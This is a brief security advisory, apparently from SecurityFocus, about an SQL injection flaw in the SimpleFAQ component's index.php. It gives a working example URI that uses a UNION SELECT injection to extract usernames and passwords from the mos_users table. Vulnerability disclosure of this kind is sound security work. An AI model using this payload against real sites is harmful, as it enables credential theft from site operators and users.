SimpleFAQ Index.PHP SQL Injection Vulnerability

An attacker can use a browser to exploit this issue.

The following example URI is available:

http://www.example.com/index.php?option=com_simplefaq&task=answer&Itemid=9999&catid=9999&aid=-1/**/union/**/select/**/0,username,password,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0/**/from/**/mos_users/*


 

Privacy Statement
Copyright 2010, SecurityFocus